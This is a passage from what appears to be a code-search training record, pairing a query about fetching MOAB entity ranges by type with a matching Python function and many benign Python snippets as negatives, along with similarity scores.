pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def _get_input_dict(input_ids: List[Tensor], attention_mask: List[Tensor]) ->Dict[str, Tensor]:\n output_dict = {'input_ids': torch.cat(input_ids), 'attention_mask': torch.cat(attention_mask)}\n return output_dict", "def metadataGeoTags(tif: TiffFile):\n geoTag: TiffTag = tif.pages[0].tags.get('GeoKeyDirectoryTag')\n if geoTag is not None:\n g: TiffTag = tif.pages[0].tags.get(34737)\n g2: TiffTag = tif.pages[0].tags.get(34736)\n g3: TiffTag = tif.pages[0].tags.get(33922)\n g4: TiffTag = tif.pages[0].tags.get(33550)\n\n tags = [(geoTag.code, 'H', geoTag.count, geoTag.value),\n (g.code, 's', g.count, g.value),\n (g2.code, 'd', g2.count, g2.value),\n (g3.code, 'd', g3.count, g3.value),\n (g4.code, 'd', g4.count, g4.value)]\n return tags\n else:\n print('no geo tags in file')", "def _tags(self):\n retval = []\n for of in self.tagnames:\n retval.append([of, self.get_datatype(of), self.get(of)])\n return retval", "def get_simplified_tags(self) -> Dict:\n return self.orthanc.get_instance_simplified_tags(self.identifier)", "def inputs_for_model(self, features: Union[SquadExample, List[SquadExample]]) -> Dict:\n args = ['input_ids', 'attention_mask']\n model_type = type(self.model).__name__.lower()\n\n if 'distilbert' not in model_type and 'xlm' not in model_type:\n args += ['token_type_ids']\n\n if 'xlnet' in model_type or 'xlm' in model_type:\n args += ['cls_index', 'p_mask']\n\n if isinstance(features, SquadExample):\n return {k: features.__dict__[k] for k in args}\n else:\n return {k: [feature.__dict__[k] for feature in features] for k in args}", "def tags(self) -> dict:\n\n return self._tags or None # store trivial tags as empty (for iteration), return as None", "def get_parameters(self) -> Dict[str, ParameterInfo]:\n parameter_info_list = {}\n\n for associated_op in self.associated_ops:\n word_tensor = self._get_word_tensor(associated_op)\n position_tensor = self._get_position_tensor(associated_op)\n token_tensor = self._get_token_tensor(associated_op)\n\n for param_tensor in [word_tensor, position_tensor, token_tensor]:\n op_with_param = None\n for consumer in param_tensor.consumers():\n if not consumer.name.startswith('gradients/'):\n assert op_with_param is None\n op_with_param = consumer\n assert op_with_param is not None\n parameter_info_list[param_tensor.op.name] = ParameterInfo('weight', [op_with_param.name])\n\n return parameter_info_list", "def tag(text, pos_tagger):\n features = [get_crf_features([word for word in sent]) for sent in text]\n tags = pos_tagger.predict(features)\n tagged_text = []\n for i in range(len(text)):\n tagged_sent = []\n for j in range(len(text[i])):\n tagged_sent.append((text[i][j], tags[i][j]))\n tagged_text.append(tagged_sent)\n #print(tags)\n return tags, tagged_text", "def tags(self) -> Mapping[str, Any]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Mapping[str, Any]:\n return pulumi.get(self, \"tags\")", "def tag():\n iso_list = []\n tags = [\"spatial_entity\", \"place\", \"motion\", \"location\", \"signal\", \"qslink\", \"olink\"]\n for token in doc:\n if token.norm_ in tags:\n iso_list.append(token.norm_)\n setList = list(set(iso_list))\n my_dict = {i: iso_list.count(i) for i in setList}\n\n for i in tags:\n if i.lower() not in my_dict:\n my_dict[i] = 0\n print(my_dict)", "def kgml_parser(self, kegg_cpd_id_list):\n result_dic = dict()\n # try:\n kg_tree = et.fromstring(self.kgml)\n for cpd in kegg_cpd_id_list:\n for el in kg_tree.iterfind('entry/graphics[@name=\"%s\"]' % cpd):\n if cpd not in result_dic.keys():\n result_dic[cpd] = [(el.get('x'), el.get('y'))]\n else:\n result_dic[cpd].append((el.get('x'), el.get('y')))\n # except:\n # # todo error exception\n # print 'error while parsing kgml of %s' % self.kegg_id\n return result_dic", "def network_nodes_species(self):\n G, mapping = self.network()\n waste, resources, intmed_products = self.amenities()\n\n node_dict = {}\n\n for nd in G:\n # print(nd)\n if isinstance(nd, int):\n node_dict[nd] = \"r\"\n elif nd in self.commodity:\n node_dict[nd] = \"Xc\"\n elif nd in waste:\n node_dict[nd] = \"w\"\n elif nd in resources:\n node_dict[nd] = \"Xr\"\n elif nd in intmed_products:\n node_dict[nd] = \"InPr\"\n\n return node_dict", "def _metric_tags(self):\r\n tags = [\r\n u'{}.{}:{}'.format(self.__class__.__name__, attr, self[attr])\r\n for attr in self.metric_tag_fields\r\n if attr in self.attributes\r\n ]\r\n tags.append(u'model_class:{}'.format(self.__class__.__name__))\r\n return tags", "def get_antags(self):\n antags = []\n for obj in self.antagobjs.group_by(AntagObjective.mindkey):\n antag = {'key': obj.mindkey, 'name': obj.mindname, 'role': obj.special_role}\n antags.append(antag)\n return antags", "def feature_tags(self) -> pulumi.Output[Sequence['outputs.ApplicationFeatureTag']]:\n return pulumi.get(self, \"feature_tags\")", "def CreateGeneModels(genes_cmpt, transcripts_cmpt, exons_cmpt, utr3_cmpt, utr5_cmpt, cds_cmpt):\n gene_counter, gene_models = 1, []\n for gene_entry in genes_cmpt: ## Figure out the genes and transcripts associated feature \n if gene_entry in transcripts_cmpt:\n gene=init_gene() \n gene['id']=gene_counter\n gene['name']=gene_entry[1]\n gene['chr']=genes_cmpt[gene_entry]['chr']\n gene['source']=genes_cmpt[gene_entry]['source']\n gene['start']=genes_cmpt[gene_entry]['start']\n gene['stop']=genes_cmpt[gene_entry]['stop']\n gene['strand']=genes_cmpt[gene_entry]['strand']\n if not gene['strand'] in ['+', '-']:\n gene['strand']='.' # Strand info not known replaced with a dot symbol instead of None, ?, . etc.\n if len(transcripts_cmpt[gene_entry])>1:\n gene['is_alt_spliced'] = 1\n gene['is_alt'] = 1\n\t gtype=[]\n for tids in transcripts_cmpt[gene_entry]: ## transcript section related tags \n gene['transcripts'].append(tids['ID'])\n\t\tgtype.append(tids['type'])\n exon_cod, utr5_cod, utr3_cod, cds_cod = [], [], [], []\n if (gene['chr'], tids['ID']) in exons_cmpt:\n exon_cod = [[feat_exon['start'], feat_exon['stop']] for feat_exon in exons_cmpt[(gene['chr'], tids['ID'])]]\n if (gene['chr'], tids['ID']) in utr5_cmpt:\n utr5_cod = [[feat_utr5['start'], feat_utr5['stop']] for feat_utr5 in utr5_cmpt[(gene['chr'], tids['ID'])]]\n if (gene['chr'], tids['ID']) in utr3_cmpt:\n utr3_cod = [[feat_utr3['start'], feat_utr3['stop']] for feat_utr3 in utr3_cmpt[(gene['chr'], tids['ID'])]]\n if (gene['chr'], tids['ID']) in cds_cmpt:\n cds_cod = [[feat_cds['start'], feat_cds['stop']] for feat_cds in cds_cmpt[(gene['chr'], tids['ID'])]]\n if len(exon_cod) == 0: ## build exon coordinates from UTR3, UTR5 and CDS\n if cds_cod != []:\n exon_cod=createExon(gene['strand'], utr5_cod, cds_cod, utr3_cod) \n\n if gene['strand']=='-': ## general order to coordinates\n if len(exon_cod) >1:\n if exon_cod[0][0] > exon_cod[-1][0]:\n exon_cod.reverse()\n if len(cds_cod) >1:\n if cds_cod[0][0] > cds_cod[-1][0]: \n cds_cod.reverse()\n if len(utr3_cod) >1:\n if utr3_cod[0][0] > utr3_cod[-1][0]: \n utr3_cod.reverse()\n if len(utr5_cod) >1:\n if utr5_cod[0][0] > utr5_cod[-1][0]:\n utr5_cod.reverse()\n\n tis, cdsStop, tss, cleave = [], [], [], [] ## speacial sited in the gene region \n if cds_cod != []:\n if gene['strand'] == '+':\n tis = [cds_cod[0][0]]\n cdsStop = [cds_cod[-1][1]-3]\n elif gene['strand'] == '-':\n tis = [cds_cod[-1][1]]\n cdsStop = [cds_cod[0][0]+3]\n if utr5_cod != []:\n if gene['strand'] == '+':\n tss = [utr5_cod[0][0]]\n elif gene['strand'] == '-':\n tss = [utr5_cod[-1][1]]\n if utr3_cod != []:\n if gene['strand'] == '+':\n cleave = [utr3_cod[-1][1]]\n elif gene['strand'] == '-':\n cleave = [utr3_cod[0][0]]\n\n cds_status, exon_status, utr_status = 0, 0, 0 ## status of the complete elements of the gene\n if cds_cod != []: ## adding phase to the CDS region \n cds_cod_phase = addCDSphase(gene['strand'], cds_cod)\n cds_status = 1\n gene['cds_exons'].append(cds_cod_phase)\n\n if exon_cod != []: \n exon_status = 1\n if utr5_cod != [] or utr3_cod != []: \n utr_status = 1\n if cds_status != 0 and exon_status != 0 and utr_status != 0:\n gene['transcript_status'].append(1)\n else:\n gene['transcript_status'].append(0)\n\n if exon_cod: ## final check point for a valid gene model \n gene['exons'].append(exon_cod)\n gene['utr3_exons'].append(utr3_cod)\n gene['utr5_exons'].append(utr5_cod)\n gene['tis'].append(tis)\n gene['cdsStop'].append(cdsStop)\n gene['tss'].append(tss)\n gene['cleave'].append(cleave) \n\t \n\t gtype=list(set(gtype)) ## different types \n gene['gene_info']=dict(ID=gene_entry[1],\n\t\t\t\tSource=genes_cmpt[gene_entry]['source'],\n\t\t\t\tType=gtype)\n gene=FeatureValueFormat(gene) ## get prepare for MAT writing \n gene_counter+=1\n gene_models.append(gene)\n return gene_models", "def get_tags_gtf(tagline):\n\n tags = dict()\n for t in tagline.strip(';').split(';'):\n tt = t.strip(' ').split(' ')\n tags[tt[0]] = tt[1].strip('\"')\n return tags", "def tags(self) -> Mapping[str, str]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Mapping[str, str]:\n return pulumi.get(self, \"tags\")" ]
[ "0.6049964", "0.5798417", "0.5783547", "0.56233895", "0.56191564", "0.5531968", "0.54956996", "0.5407354", "0.54043907", "0.5376861", "0.5376861", "0.53438914", "0.53383356", "0.5330779", "0.5323087", "0.5323087", "0.5323087", "0.5323087", "0.5323087", "0.5323087", "0.5323087", "0.5323087", "0.5320604", "0.5311345", "0.52669716", "0.5262341", "0.5250732", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.5239589", "0.52186155", "0.5217063", "0.5209652", "0.5196402", "0.51846635", "0.5179804", "0.51782644", "0.51758707", "0.51758707", "0.51612175", "0.51521665", "0.5151035", "0.51502085", "0.51380515", "0.5129575", "0.51211137", "0.51176107", "0.511367", "0.511367" ]
0.6765775
0
Get a dictionary with MOAB ranges for each of the requested entity types inputs
def get_native_ranges(my_core, meshset, entity_types): native_ranges = {} for entity_type in entity_types: native_ranges[entity_type] = my_core.get_entities_by_type( meshset, entity_type) return native_ranges
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_entityset_ranges(my_core, meshset, geom_dim):\n\n entityset_ranges = {}\n entityset_types = ['Nodes', 'Curves', 'Surfaces', 'Volumes']\n for dimension, set_type in enumerate(entityset_types):\n entityset_ranges[set_type] = my_core.get_entities_by_type_and_tag(meshset, types.MBENTITYSET, geom_dim,\n [dimension])\n return entityset_ranges", "def get_ranges(graph: Graph, property_to_id: Dict[str, int], entity_type_to_id: Dict[str, int]) -> Dict[int, int]:\n # dictionary pointing from object property id to an entity type id\n ranges = {}\n\n # add all range triples for which the subject is an object property and the object is an entity type\n for subject, predicate, object in graph.triples((None, RDFS.range, None)):\n if subject in property_to_id and object in entity_type_to_id:\n ranges[property_to_id[subject]] = entity_type_to_id[object]\n return ranges", "def _parse_requantization_ranges(self):\n res = {}\n\n print_suffix = \"__print__\"\n lines = self._get_valid_log()\n temp_min = {}\n temp_max = {}\n pattern_def = r\"{};{}:\\[\\-?\\d+\\.?\\d*e?-?\\+?\\d*\\]\".format(print_suffix, self.postfix)\n for i in lines:\n if not re.search(pattern_def, i):\n continue\n\n max_line_data = i.split(print_suffix + \";\" + self.postfix)[-1]\n min_value = max_line_data.split('][')[0].split('[')[1]\n max_value = max_line_data.split('][')[1].split(']')[0]\n name = i.split(';')[1].strip()[:-len(print_suffix)]\n if name not in temp_min:\n temp_min[name] = []\n if name not in temp_max:\n temp_max[name] = []\n\n temp_min[name].append(float(min_value))\n temp_max[name].append(float(max_value))\n\n for key in temp_min:\n target_min_index = int(np.ceil(len(temp_min[key]) * (1 - self.threshold)))\n\n if key not in res:\n res[key] = []\n\n if target_min_index > len(temp_min[key]) - 1:\n target_min_index = len(temp_min[key]) - 1\n res[key].append(sorted(temp_min[key])[target_min_index])\n\n for key in temp_max:\n target_max_index = int(np.floor(len(temp_max[key]) * self.threshold)) - 1\n\n if target_max_index > len(temp_max[key]) - 1:\n target_max_index = len(temp_max[key]) - 1\n\n res[key].append(sorted(temp_max[key])[target_max_index])\n\n if self.tensor_data:\n for k, v in self.tensor_data.items():\n if k in res:\n self.logger.debug(\"Update node {} min to {}, max to {}.\".format(k, v[2], v[3]))\n res[k] = [v[2], v[3]]\n return res", "def get_param_ranges(line_model):\n\n line_models = ['voigt', 'rosato', 'stehle', 'stehle_param', ]\n n_upper_range = [(np.nan, np.nan), (3, 7), (3, 30), (3, 9)]\n e_dens_range = [(np.nan, np.nan), (1e19, 1e22), (1e16, 1e25), (0., 1e22)]\n temp_range = [(np.nan, np.nan), (0.32, 32), (0.22, 110), (0., 1000)]\n b_field_range = [(np.nan, np.nan), (0, 5), (0, 5), (0, 5)]\n\n param_ranges = list(zip(line_models, n_upper_range, e_dens_range, temp_range, b_field_range))\n columns = ['line_model_name', 'n_upper_range', 'e_dens_range', 'temp_range', 'b_field_range']\n param_ranges = pd.DataFrame(data=param_ranges, columns=columns)\n\n n_upper_range = param_ranges['n_upper_range'][param_ranges['line_model_name'] == line_model].values[0]\n e_dens_range = param_ranges['e_dens_range'][param_ranges['line_model_name'] == line_model].values[0]\n temp_range = param_ranges['temp_range'][param_ranges['line_model_name'] == line_model].values[0]\n b_field_range = param_ranges['b_field_range'][param_ranges['line_model_name'] == line_model].values[0]\n\n return n_upper_range, e_dens_range, temp_range, b_field_range", "def get_etype_2_minmax_funcEnum(entitytype_arr):\n etype_2_minmax_funcEnum = {}\n s = pd.Series(entitytype_arr)\n for name, group in s.groupby(s):\n etype_2_minmax_funcEnum[name] = (min(group.index), max(group.index))\n return etype_2_minmax_funcEnum", "def get_limits(age_groups):\n\n limits = {}\n for data in age_groups:\n pattern = re.compile(r'([\\d]+)-([\\d]+)')\n match = pattern.search(data)\n age_min = int(match.group(1).strip())\n age_max = int(match.group(2).strip())\n # print(f'limits = {age_min} to {age_max}')\n limits[f'Age_{data}'] = [age_min, age_max]\n return limits", "def range_dic_(df_):\n range_dic = {}\n for man in df_['maneuver']:\n trial_indx = df_.index[df_['maneuver'] == man].tolist()\n range_ = (min(trial_indx), max(trial_indx))\n range_dic.update({man: range_})\n return range_dic", "def range_dic_(df_):\n range_dic = {}\n for man in df_['maneuver']:\n trial_indx = df_.index[df_['maneuver'] == man].tolist()\n range_ = (min(trial_indx), max(trial_indx))\n range_dic.update({man: range_})\n return range_dic", "def _calc_range(self) -> np.ndarray:\n if self._is_ct25k():\n range_resolution = 30\n n_gates = 256\n else:\n n_gates = int(self.metadata[\"number_of_gates\"])\n range_resolution = int(self.metadata[\"range_resolution\"])\n return np.arange(n_gates) * range_resolution + range_resolution / 2", "def define_range():\n\n def_range = {'lt': [0.0, 24.0],\n 'lon': [0.0, 360.0],\n 'angle': [0.0, 2.0 * np.pi]}\n\n return def_range", "def test_get_meta_range(self):\n pass", "def getRangeMM(self) -> float:\n ...", "def get_range_info(self):\n with open(self.range_path, 'r') as _file:\n for line in _file.readlines():\n list0 = line.strip().split('-')\n range_dict = {\n 'min': int(list0[0], 16),\n 'max': int(list0[1], 16),\n 'max_offset': int(list0[1], 16) - int(list0[0], 16),\n }\n self.ranges.append(range_dict)", "def _get_energy_range(self):\n\n e0_min = self.network.isomers[0].E0\n e0_max = e0_min\n\n for isomer in self.network.isomers[1:]:\n E0 = isomer.E0\n if E0 < e0_min:\n e0_min = E0\n if E0 > e0_max:\n e0_max = E0\n for reactant in self.network.reactants:\n E0 = reactant.E0\n if E0 < e0_min:\n e0_min = E0\n if E0 > e0_max:\n e0_max = E0\n for product in self.network.products:\n E0 = product.E0\n if E0 < e0_min:\n e0_min = E0\n if E0 > e0_max:\n e0_max = E0\n for rxn in self.network.path_reactions:\n E0 = rxn.transition_state.conformer.E0.value_si\n if E0 < e0_min:\n e0_min = E0\n if E0 > e0_max:\n e0_max = E0\n\n return e0_min, e0_max", "def slot_mappings(self) -> Dict[Text, Union[Dict, List[Dict]]]:\n # type: () -> Dict[Text: Union[Dict, List[Dict]]]\n return {\n \"numero_prendas\": [\n self.from_entity(entity=\"number\"),\n\n ]\n }", "def slot_mappings(self) -> Dict[Text, Union[Dict, List[Dict]]]:\n # type: () -> Dict[Text: Union[Dict, List[Dict]]]\n return {\n \"numero_prendas\": [\n self.from_entity(entity=\"number\"),\n\n ]\n }", "def slot_mappings(self) -> Dict[Text, Union[Dict, List[Dict]]]:\n\n return {\n \"product\": [\n self.from_entity(entity=\"product\", intent=[\"inform\"]),\n ],\n \"applicant_name\": [\n self.from_entity(entity=\"applicant_name\", intent=[\"inform\"]),\n ],\n \"applicant_dob\": [\n self.from_entity(entity=\"applicant_dob\", intent=[\"inform\"]),\n ],\n \"applicant_phoneno\": [\n self.from_entity(entity=\"applicant_phoneno\", intent=[\"inform\"]),\n ],\n \"applicant_address\": [\n self.from_entity(entity=\"applicant_address\", intent=[\"inform\"]),\n ]\n }", "def map_range( self, rng ):\n rmap = {\n '2 nA': pac.Ammeter.CurrentRange.N2,\n '20 nA': pac.Ammeter.CurrentRange.N20,\n '200 nA': pac.Ammeter.CurrentRange.N200,\n '2 uA': pac.Ammeter.CurrentRange.U2,\n '20 uA': pac.Ammeter.CurrentRange.U20,\n '200 uA': pac.Ammeter.CurrentRange.U200,\n '2 mA': pac.Ammeter.CurrentRange.M2,\n '20 mA': pac.Ammeter.CurrentRange.M20\n }\n \n if rng in rmap:\n return rmap[ rng ]\n \n else:\n raise ValueError( 'Invalid range' )", "def _part_group_cell_mapper(bd_type):\n js, iss = np.meshgrid(range(smt.cols), range(smt.rows)) # zero indexed to agree with python interpretation\n idx = bd_type.flatten() != -1\n out = dict(zip(range(1, idx.sum() + 1), list(zip(iss.flatten()[idx], js.flatten()[idx]))))\n return out", "def get_range(self):\n classes = concrete_descendents(self.class_)\n d=dict([(name,class_) for name,class_ in classes.items()])\n if self.allow_None:\n d['None']=None\n return d", "def compute_bounds(self, space):\n bounds = np.zeros((len(space), 2))\n\n for idx, param in enumerate(space):\n\n if TYPE[param[\"type\"]] is TYPE.FLOAT or \\\n TYPE[param[\"type\"]] is TYPE.INTEGER:\n bounds[idx] = (param[\"min\"], param[\"max\"])\n\n elif TYPE[param[\"type\"]] is TYPE.DISCRETE or \\\n TYPE[param[\"type\"]] is TYPE.DISCRETE:\n bounds[idx] = (0, len(param['values']))\n\n return bounds", "def _get_area_incmfd_attr(max_np, max_hd, max_bins):\n\n att = []\n att.append({'name': 'src_id', 'type': 'String', 'len': 10})\n att.append({'name': 'src_name', 'type': 'String', 'len': 30})\n att.append({'name': 'tect_reg', 'type': 'String', 'len': 30})\n att.append({'name': 'upp_seismo', 'type': 'Real'})\n att.append({'name': 'low_seismo', 'type': 'Real'})\n att.append({'name': 'mag_scal_r', 'type': 'String', 'len': 15})\n att.append({'name': 'rup_asp_ra', 'type': 'Real'})\n att.append({'name': 'mfd_type', 'type': 'String', 'len': 20})\n\n att.append({'name': 'min_mag', 'type': 'Real'})\n att.append({'name': 'bin_width', 'type': 'Real'})\n att.append({'name': 'num_bins', 'type': 'Integer'})\n for i in range(1, max_bins+1):\n lab = 'or_%d' % (i)\n att.append({'name': lab, 'type': 'Real'})\n\n att.append({'name': 'num_npd', 'type': 'Integer'})\n for i in range(1, max_np+1):\n lab = 'weight_%d' % (i)\n att.append({'name': lab, 'type': 'Real'})\n lab = 'strike_%d' % (i)\n att.append({'name': lab, 'type': 'Real'})\n lab = 'rake_%d' % (i)\n att.append({'name': lab, 'type': 'Real'})\n lab = 'dip_%d' % (i)\n att.append({'name': lab, 'type': 'Real'})\n\n att.append({'name': 'num_hdd', 'type': 'Integer'})\n for i in range(1, max_hd+1):\n lab = 'hdd_d_%d' % (i)\n att.append({'name': lab, 'type': 'Real'})\n lab = 'hdd_w_%d' % (i)\n att.append({'name': lab, 'type': 'Real'})\n\n return att", "def slot_mappings(self) -> Dict[Text, Union[Dict, List[Dict]]]:\n\n return {\n \"search_type\": [\n self.from_trigger_intent(\n intent=\"search_transactions\", value=\"spend\"\n ),\n self.from_trigger_intent(\n intent=\"check_earnings\", value=\"deposit\"\n ),\n ],\n \"time\": [\n self.from_entity(entity=\"time\"),\n ]\n }", "def _get_entity_mappings(query_list: ProcessedQueryList) -> Dict:\n entity_labels = set()\n logger.info(\"Generating Entity Labels...\")\n for d, i, entities in zip(\n query_list.domains(), query_list.intents(), query_list.entities()\n ):\n if len(entities):\n for entity in entities:\n e = str(entity.entity.type)\n entity_labels.add(f\"{d}.{i}.B|{e}\")\n entity_labels.add(f\"{d}.{i}.I|{e}\")\n entity_labels.add(f\"{d}.{i}.S|{e}\")\n entity_labels.add(f\"{d}.{i}.E|{e}\")\n\n e = \"O|\"\n entity_labels.add(f\"{d}.{i}.{e}\")\n\n entity_labels = sorted(list(entity_labels))\n return dict(zip(entity_labels, range(len(entity_labels))))", "def slot_mappings(self) -> Dict[Text, Union[Dict, List[Dict]]]:\n\n return {\n \"amount_of_money\": [\n self.from_entity(entity=\"amount-of-money\"),\n self.from_entity(entity=\"number\"),\n ],\n \"confirm\": [\n self.from_intent(value=True, intent=\"affirm\"),\n self.from_intent(value=False, intent=\"deny\"),\n ],\n }", "def range_params(self, ran, kw):\n specs = {\"range\": (SchemaNode(\"value\"),\n SchemaNode(\"param\").set_attr(\"name\",\"minInclusive\"),\n SchemaNode(\"param\").set_attr(\"name\",\"maxInclusive\")),\n \"length\": (SchemaNode(\"param\").set_attr(\"name\",\"length\"),\n SchemaNode(\"param\").set_attr(\"name\",\"minLength\"),\n SchemaNode(\"param\").set_attr(\"name\",\"maxLength\"))}\n (exact, min_, max_) = specs[kw]\n if (len(ran) == 1 or ran[0] == ran[1]) and ran[0][0] != \"m\":\n elem = exact\n elem.text = ran[0]\n return [elem]\n res = []\n if ran[0][0] != \"m\":\n elem = min_\n elem.text = ran[0]\n res.append(elem)\n if ran[1][0] != \"m\":\n elem = max_\n elem.text = ran[1]\n res.append(elem)\n return res", "def slot_mappings(self) -> Dict[Text, Union[Dict, List[Dict]]]:\n\n return {\n \"bug\":[self.from_entity(\n entity=\"bug\", \n intent=\"inform\"),\n self.from_text(\n intent=\"inform\")],\n \"beverage\": [self.from_entity(\n entity=\"beverage\", \n intent=\"inform\"), \n self.from_text(\n intent=\"inform\")],\n \"second_person_plural\": [self.from_entity(\n entity=\"second_person_plural\", \n intent=\"inform\"),\n self.from_text(\n intent=\"inform\")],\n \"cot_caught\": [self.from_entity(\n entity=\"cot_caught\", \n intent=\"inform\"),\n self.from_text(\n intent=\"inform\")],\n \"rain_sun\": [self.from_entity(\n entity=\"rain_sun\", \n intent=\"inform\"),\n self.from_text(\n intent=\"inform\")],\n \"crawfish\": [self.from_entity(\n entity=\"crawfish\", \n intent=\"inform\"),\n self.from_text(\n intent=\"inform\")],\n \"halloween\": [self.from_entity(\n entity=\"halloween\", \n intent=\"inform\"),\n self.from_text(\n intent=\"inform\")],\n \"sandwich\": [self.from_entity(\n entity=\"sandwich\", \n intent=\"inform\"),\n self.from_text(\n intent=\"inform\")],\n \"side_road\": [self.from_entity(\n entity=\"side_road\", \n intent=\"inform\"),\n self.from_text(\n intent=\"inform\")],\n \"shoes\": [self.from_entity(\n entity=\"shoes\", \n intent=\"inform\"),\n self.from_text(\n intent=\"inform\")],\n \"highway\": [self.from_entity(\n entity=\"highway\", \n intent=\"inform\"),\n self.from_text(\n intent=\"inform\")],\n \"yard_sale\": [self.from_entity(\n entity=\"yard_sale\", \n intent=\"inform\"),\n self.from_text(\n intent=\"inform\")],\n \"rubbernecking\": [self.from_entity(\n entity=\"rubbernecking\", \n intent=\"inform\"),\n self.from_text(\n 